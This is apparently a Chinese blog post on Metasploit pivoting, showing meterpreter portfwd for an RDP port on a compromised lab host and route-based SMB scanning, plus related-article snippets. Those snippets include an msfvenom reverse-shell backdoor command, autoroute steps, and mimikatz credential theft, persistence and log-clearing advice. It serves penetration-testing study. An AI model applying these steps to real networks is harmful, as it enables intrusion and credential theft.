Metasploit 跳板攻击

于 2025-03-21 21:07:51 发布
阅读量478 收藏 5
点赞数 4
CC 4.0 BY-SA版权
文章标签: 服务器 linux metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/imtech/article/details/146428842

         今天有一个机会测试MSF的跳板攻击,涉及到端口转发和添加路由,下面详细介绍一下。2个可以单独使用,也可以结合使用。以下是测试拓扑。

 

        前提是攻击机192.168.136.155通过某种方式控制了S1,192.168.100.100,然后可以通过端口转发方式连接该主机的其他端口,也可以通过添加路由的方式把该主机当成跳板攻击其他主机。

一、端口转发

portfwd 原理

portfwd 是借用 meterpreter shell 建立的连接进行数据传输,达到端口转发的目的。

当建立反向连接时,可以绕过防火墙的检测。

命令:

meterpreter > portfwd --help
Usage: portfwd [-h] [add | delete | list | flush] [args]

选项说明
  • -L <opt>:指定本地主机监听的地址(可选)。在反向连接中,表示本地主机要连接的地址。
  • -R:表示这是一个反向端口转发。
  • -i <opt>:指定要交互的端口转发条目的索引(使用 "list" 命令查看)。
  • -l <opt>:指定本地监听的端口。在反向连接中,表示本地要连接的端口。
  • -p <opt>:指定远程连接的端口。在反向连接中,表示远程监听的端口。
  • -r <opt>:指定远程连接的主机地址。

以上使用deepseek翻译,较为精准。

端口转发可以理解为反向代理,内网穿透,有使用frp等工具经验的比较好理解,就是把远程端口映射到本地来。

如:meterpreter > portfwd add -L 192.168.136.155 -l 13389 -p 3389 -r 192.168.100.100

以上命令是把远程被攻击主机192.168.100.100的3389(rdp)端口送到本地地址192.168.0.2监听13389的端口。然后在本地使用rdp工具连接192.168.136.155:13389达到远程桌面连接的目的。

二、Pivoting跳板攻击

        以前我写过一篇,当时比较匆忙测试不完整,今天详细测试了以下。

一般获得meterpreter以后可以使用run get_local_subnets获取目标主机的内网IP段情况。

获得上图S1的权限以后可以添加路由到S2。

        上次测试的是使用S1作为跳板扫描跨网段的S2,可以成功。今天突发奇想,比如把S1当成跳板攻击S2,利用ms17-010漏洞使用S1的会话再建立与S2的会话。

       第一次失败以后还以为本地侦听端口冲突导致,改变本地监听端口,仍然失败。应该能证实会话不能嵌套。

        也就是说可以使用S1作为跳板使用,auxiliary内的模块可以使用,比如扫描模块,暴力破解模块,测试过一个smb扫描,smb暴力破解都可以正常使用。

Msf跳板: SSH 版本 route
weiliang369的博客
03-23 1392
其实就是利用SSH的端口转发做代理功能 root@Kali:/tmp# git clone https://github.com/mubix/metassh.git Cloning into metassh... root@Kali:/tmp# cp -rf metassh/* /pen/msf3/plugins/ 启动MSF 载入插件 msf > load meta_ssh [+] Added 2 Exploit modules for metaSSH [+] Added 1 Pa.
【Web安全】Payload的探索与Kali渗透测试框架-msf
李响
03-16 1151
文章目录1 MSF基本介绍2 将数据库与MSF关联3 POC&&EXP4 Payload5 bundler和msf版本不匹配问题6 msf使用步骤6.1 查win7 和 kali ip地址6.2 运行msfcon 自动补全6.3 逐步运行msf各个模块 1 MSF基本介绍 metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的。可以在 k...
外网主机通过msf和内网跳板机访问内网不出网的主机
m0_62284238的博客
09-01 488
获得内网的一台可出网主机的权限后,外网主机通过msf,以该主机为代理访问内网另一台不出网的主机
内网渗透——Metasploit的代理转发
m0_65544268的博客
07-10 1038
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
内网安全:Socks 代理 -- 本地代理 技术.
Innocence_0的博客
06-29 1099
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
内网渗透(一)反向代理实现外网访问到内网
m0_63699746的博客
08-02 1657
msfvenom -p windows/meterpreter/reverser_tcp LHOST=你的云服务器ip LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。总结:首先攻击端(服务器攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板攻击机,来实现访问另一台内网上的虚拟机。攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。
内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
qq_60115503的博客
04-20 3576
靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows server 2008是域控 解压后双击文件夹中的,vmx文件即可一键创建虚拟机,登录密码都是hongrisec@2019,2003和2009输入密码后会强制要求改密码 网络配置 win7网络适配器为自定义(VMnet1仅主机模式),再添加一个网络适配器设置为NAT模式; windows200.
内网安全之:Metasploit 跳板攻击: 添加路由方式
f_carey的博客
09-04 1030
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Metasploit 跳板攻击: 添加路由方式1 Metasploit 跳板攻击: 添加路由方式原理2 实验环境2.1 建立 meterpreter 反向连接2.2 查看当前系统信息2.3 利用增加的路由扫描新网段的主机3 meterpreter 基础命令 1 Metasploit 跳板攻击: 添加路由方式.
kali使用Metasploit进行渗透攻击
lhf13036943631的博客
05-06 1054
2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。(2)查找与EasyFileSharing有关的渗透模块。(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)
第7章渗透攻击 使用Metasploit对操作系统发起攻击
qq_69351815的博客
06-10 653
渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。
Metasploit入侵win7
qq_53030229的博客
11-07 2174
文章目录一、Metasploit是什么?1、Auxiliaries(辅助模块)2、Exploit(渗透攻击模块)3、payload(攻击载荷模块)4、Post(后期渗透模块)5、Encoder(编码工具模块)二、Metasploit入侵步骤1.引入库2.读入数据 一、Metasploit是什么? 这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行) Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板
Metasploit学习笔记之——用Metasploit模拟谷歌极光攻击
JochenZou的专栏
12-20 6352
Metasploit模拟谷歌极光攻击重现 本攻击重现是简化的一个攻击过程,省略了前期情报搜集阶段中外围信息搜索、主机探测与端口扫描、服务扫描与查点、网络漏洞扫描等工作,目的是在最短的时间内模拟渗透攻击的核心环节,是对后续的复杂网络渗透攻击和网络安全防护所做的前期工作。 1.      准备工作 1.1   攻击路线图 下图为此次实验的攻击路线图,主要实现
利用msf进行后渗透中常见的知识点
热门推荐
Shanfenglan's blog
10-28 10万+
内网代理 首先需要一个session 搭建路由 然后配置路由,比如我们配置让这个session来转发我们访问的172.16.250.0/24这个网段的所有流量。这时候我们需要在meterpreter里面执行 run autoroute -s 172.16.250.0/24 执行完后,可以将这个shell放到后台(利用bg命令)然后使用route print来查看配置是否成功,成功的范例如下: 配置socks5 这时候我们已经搭好了路由,但是还不能使用,这时候还需要创建一个socks5,然后通过pr
msf rhosts设置文件_内网渗透-msf基本使用及添加路由(跳板
weixin_39544333的博客
11-28 2047
介绍MSFMetasploit)是一款开源安全漏洞检测工具,附带上千个已知漏洞的exp,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。使用msf中内置的payload、module、shellcode、listener等功能,结合自己开发的脚本,可进行渗透以及内网域渗透。常用命令show exploits – 查看所有可用的渗透攻击程序代码 show auxilia...
使用msf入侵多层级网络架构
06-01 2万+
假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本层层突破,获取到第4层靶机Server5的系统权限呢?首先,我们通过Web入侵获得Server1权限,并...
Metasploit portfwd跳板渗透
红领巾 的专栏
07-11 5048
前几天翻看Metasploit’s Meterpreter文档中关于portfwd介绍 Usage:portfwd [ -arv ] [ -L laddr ] [ -l lport ][ -h rhost ] [ -p rport ] [ -P ],看懂了不会用。再者就是在《metasploit渗透测试指南》p89页上参考到了部分。google到了篇老外关于meterpreter的portfwd
渗透测试之三内网跳板
习惯积淀的博客
05-23 4888
搭建内网的转发跳板 当成功控制一个网络中的一台主机后,由于后面的主机都在内网中无法访问,所以需要在跳板机上搭建代理,实现对内网中的其他主机的访问 portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4–IPV6的转换转发。并且内置于meterpreter。 攻击机: 192.168.1.5 Debian 靶机: 192.168.1.4 Windows 7 192.168.1...
Meterpreter内网穿透
快吃小蛋糕吧的博客
11-06 3566
本文转载自https://www.freebuf.com/articles/network/125278.html 本文实操部分均为本人复现 纵深防御也被被称之为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。 何谓路由 确定设备如.
Metasploit使用内网跳板, 扫描局域网主机
dianyan5615的博客
06-21 1223
  最近,拿到一台内网机器, 苦于无法使用nmap扫描改主机的内网, 所以才有此文   在跳板机子获取一定权限后,需要积极的向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的meterpreter后门,可以使系列的操作更容易。   使用Meterpreter内置的添加路由功能   获取路由信息 run get_local_subnets   ...
Metasploit 后渗透攻击技术
最新发布
12-30
### Metasploit 框架后渗透攻击技术方法 #### 后渗透攻击概述 后渗透攻击是指成功利用漏洞并获得目标系统的初步访问权限后所采取的一系列行动。这些活动旨在进一步探索内部网络、提升权限、持久化控制以及数据收集等。 #### 提升权限 为了扩大对受控机器上的影响力,通常会尝试提权操作。这可以通过寻找本地服务中的弱点或未修补的安全问题来实现Metasploit提供了多种模块帮助执行此任务,例如`getsystem`命令可以试图将低级别shell转换成具有更高特权的进程[^1]。 #### 数据采集与凭证窃取 一旦获得了足够的权限,就可以开始搜集敏感信息。这可能涉及浏览文件系统查找配置文件或其他潜在有价值的数据;也可以通过特定工具如Mimikatz从内存中提取明文密码和其他认证材料。在Metasploit中,有专门设计用于此类目的的辅助模块和脚本[^2]。 ```bash use post/windows/gather/credentials/mimikatz set SESSION 1 run ``` 这段代码展示了如何加载mimikatz模块,并设置要运行它的会话ID(这里假设为1),最后启动它以获取存储于Windows操作系统内的各种形式的身份验证令牌。 #### 内网横向移动 当掌握了某些节点上更高级别的访问权之后,下一步往往是向其他设备蔓延开来。借助已知的有效账户凭据或是新发现的服务缺陷作为跳板,能够悄无声息地渗入更多位置。对于Linux环境下的SSH密钥传播就是一个典型例子;而在Windows域环境中,则可能会运用到Pass-the-Hash (PtH) 或 Pass-The-Ticket (PTT) 技巧[^3]。 #### 建立持久性机制 为了让入侵行为不易被察觉并且能够在重启后继续保持存在感,在受害主机里安装隐蔽型恶意软件成为必要选项之一。这类程序往往伪装成合法应用程序的一部分,定期激活并与远程服务器通信维持长期联系通道。Post exploitation阶段也包含了创建计划任务、修改注册表项等多种手段达成相同效果。 #### 清理痕迹 完成既定目标之前,务必清除所有可能导致暴露身份的日志记录及其他证据。这不仅限于删除临时文件夹里的残留物,还包括干扰审计日志的功能,甚至重置防火墙规则阻止后续调查工作顺利开展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

骆驼1024

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值